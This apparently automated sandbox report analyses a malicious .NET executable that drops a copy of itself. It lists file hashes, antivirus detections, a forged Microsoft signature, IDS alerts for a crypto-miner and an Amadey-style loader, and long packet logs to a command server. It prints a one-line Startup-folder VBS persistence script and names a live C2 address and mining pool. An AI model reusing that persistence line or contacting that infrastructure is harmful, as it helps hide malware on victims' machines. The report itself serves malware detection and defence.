                                                                                                                                SHA-512:9C02BDE2D096E181F00E906F4E242905D0E54DD207F309764805C7444C9F43073106812ADE97FCA9FC2363F59ED071371276880CE85E9A307FCDB03D3250CF6A
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...FG_g.........."...................... ....@...... ....................................`..........................................................`...............6..((........................................................................... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@........................................H..........................h............................................0..........(....*.*.(....*F w>..(....(....&*.(....(....*....0............ .>..(....(..... Y?..(....(.....s........o......s...........s......+..s.... l?..(....(.......&...,.......io......o.........,...o.......,...o...........,..o.......*....4....H.._........E.6{........9.N.........(.p.......2(.....o....*......(.... .>..(....(.....(....(...+o....*Z .>..(....s.....(I...*.s....(Y...*.......*V !=..(....~....(....*...

                                                                                                                                C:\Users\user\AppData\Roaming\IsStopped.exe:Zone.Identifier

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\ZppxPm0ASs.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:true
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\ZppxPm0ASs.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):88
                                                                                                                                Entropy (8bit):4.797182403014171
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:FER/n0eFHHo0nacwREaKC5+n:FER/lFHIcNwiaZ5+
                                                                                                                                MD5:F56D540404F2AF22A08D1A387A8DFDCA
                                                                                                                                SHA1:7227DF7D107F6CB044694B9314E724D60B6348B7
                                                                                                                                SHA-256:56115797B5E2A9B7AB0A45AC5EC43840EDE5D442225788E56E4920A09FC41673
                                                                                                                                SHA-512:4B5F1733D4E5F48429453FE9220AB5940285B202C81B92DEDC1438796135792E7B25BE1310358647E55BF0858B94B5C481CAAF4A1206DB76886BFD73BAE0F184
                                                                                                                                Malicious:true
                                                                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsStopped.exe"""

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                Entropy (8bit):6.349551184218018
                                                                                                                                TrID:
                                                                                                                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                                • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                                • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                                • DOS Executable Generic (2002/1) 0.46%
                                                                                                                                File name:ZppxPm0ASs.exe
                                                                                                                                File size:89'640 bytes
                                                                                                                                MD5:3c104350cc2661c345673e91ed672c4c
                                                                                                                                SHA1:d205e94d47949cf3bc3f5226978f6d370c3d3b94
                                                                                                                                SHA256:1fb9f279263c252a09f12b69c7238c18d2325f7cf7250ebe24ad9149abe62cf4
                                                                                                                                SHA512:9c02bde2d096e181f00e906f4e242905d0e54dd207f309764805c7444c9f43073106812ade97fca9fc2363f59ed071371276880ce85e9a307fcdb03d3250cf6a
                                                                                                                                SSDEEP:1536:07Se/hE9pxIN1e8Lf0HbqH5D62np/cvarqWjc6Tpzz:07thEvmuf7E5DP/TqWjBpn
                                                                                                                                TLSH:20936D88678D8512CBAD29B7E5A590811779C3E35903D3BF09C8F6E40C437DE8B9637A
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...FG_g.........."...................... ....@...... ....................................`................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x400000
                                                                                                                                Entrypoint Section:
                                                                                                                                Digitally signed:true
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x675F4746 [Sun Dec 15 21:16:54 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:

                                                                                                                                Authenticode Signature

                                                                                                                                Signature Valid:false
                                                                                                                                Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                Error Number:-2146869232
                                                                                                                                Not Before, Not After
                                                                                                                                • 22/08/2024 21:26:44 20/08/2025 21:26:44
                                                                                                                                Subject Chain
                                                                                                                                • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                Version:3
                                                                                                                                Thumbprint MD5:FB871CDFBD500B74EE2AFA5A776E78E2
                                                                                                                                Thumbprint SHA-1:04A696B6B949498D3DE9343B11BBFBA471539735
                                                                                                                                Thumbprint SHA-256:0F619AD69C4C3DF0CBD718DB3AC011E0A774E8E7FCD3A549DCF735ABE6E6D71B
                                                                                                                                Serial:33000003FE6BCEDAD6C80303A30000000003FE

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                dec ebp
                                                                                                                                pop edx
                                                                                                                                nop
                                                                                                                                add byte ptr [ebx], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax+eax], al
                                                                                                                                add byte ptr [eax], al

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x600.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x136000x2828
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x20000x12cd40x12e0074855c6c121a6a6b1f8c00545efdd7f1False0.5331643211920529data6.154826128743383IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0x160000x6000x600a237f4a9eeab90bdcae517578e65c041False0.4147135416666667data4.041599707333217IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_VERSION0x160a00x30cdata0.43205128205128207
                                                                                                                                RT_MANIFEST0x163ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                Network Behavior

                                                                                                                                Suricata IDS Alerts

                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-16T13:41:16.995944+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.7547301.1.1.153UDP
                                                                                                                                2024-12-16T13:41:20.026422+01002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1154.216.20.243443192.168.2.749722TCP
                                                                                                                                2024-12-16T13:41:22.119408+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.749728154.216.20.243443TCP
                                                                                                                                2024-12-16T13:41:31.619715+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.7584031.1.1.153UDP
                                                                                                                                2024-12-16T13:42:18.947606+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.749839154.216.20.243443TCP
                                                                                                                                2024-12-16T13:43:18.740688+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.749956154.216.20.243443TCP

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 16, 2024 13:40:58.817828894 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:40:58.817931890 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:40:58.818020105 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:40:58.850471973 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:40:58.850512028 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.284111977 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.284234047 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:00.288610935 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:00.288633108 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.288924932 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.339267969 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:00.347908020 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:00.391356945 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.976828098 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.976862907 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.976874113 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.976895094 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.976933956 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.976965904 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:00.977031946 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:00.977065086 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:00.977089882 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.209758997 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.209780931 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.209804058 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.209884882 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.209964991 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.210005999 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.210028887 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.213172913 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.213213921 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.213252068 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.213268995 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.213337898 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.213339090 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.360224009 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.360249043 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.360336065 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.360373974 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.360498905 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.401032925 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.401051998 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.401123047 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.401160002 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.401199102 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.435297966 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.435322046 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.435394049 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.435487986 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.435558081 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.435558081 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.474953890 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.474975109 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.475056887 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.475130081 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.475191116 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.514899015 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.514916897 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.514987946 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.515012026 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.515070915 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.543486118 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.543513060 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.543566942 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.543611050 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.543632030 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.543651104 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.567032099 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.567059040 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.567234993 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.567234993 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.567280054 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.567332029 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.588499069 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.588525057 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.588602066 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.588624954 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.588680983 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.601990938 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.602018118 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.602089882 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.602123976 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.602185965 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.617352962 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.617372036 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.617439985 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.617463112 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.617508888 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.630312920 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.630333900 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.630397081 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.630434036 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.630479097 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.644124031 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.644140959 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.644215107 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.644253016 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.644300938 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.657031059 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.657066107 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.657104969 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.657144070 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.657181025 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.657196045 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.668752909 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.668790102 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.668827057 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.668870926 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.668894053 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.668970108 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.681747913 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.681765079 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.681830883 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.681864023 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.681914091 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.693921089 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.693938971 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.694005966 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.694036007 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.694078922 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.704281092 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.704299927 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.704364061 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.704401016 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.704426050 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.704444885 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.715053082 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.715070963 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.715130091 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.715159893 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.715200901 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.783530951 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.783552885 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.783623934 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.783675909 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.783698082 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.783729076 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.788983107 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.789005995 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.789072990 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.789083958 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.789128065 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.794447899 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.794462919 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.794528008 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.794543982 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.794600010 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.800139904 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.800156116 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.800229073 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.800246000 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.800307035 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.804873943 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.804889917 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.804955006 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.804970026 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.805030107 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.811187029 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.811201096 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.811266899 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.811347961 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.811405897 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.893743992 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.893767118 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.893922091 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.893963099 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.894015074 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.897851944 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.897869110 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.897984028 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.898019075 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.898071051 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.975498915 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.975527048 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.975864887 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.975948095 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.976022005 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.979573011 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.979589939 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.979686975 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.979705095 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.979758024 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.983545065 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.983560085 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.983661890 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.983683109 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.983745098 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.988184929 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.988200903 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.988287926 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.988301992 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.988349915 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.992145061 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.992163897 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.992248058 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.992265940 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:01.992321014 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:01.995305061 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:02.002935886 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:02.002955914 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:02.003006935 CET49700443192.168.2.7154.216.20.243
                                                                                                                                Dec 16, 2024 13:41:02.003021955 CET44349700154.216.20.243192.168.2.7
                                                                                                                                Dec 16, 2024 13:41:02.003056049 CET49700443192.168.2.7154.216.20.243
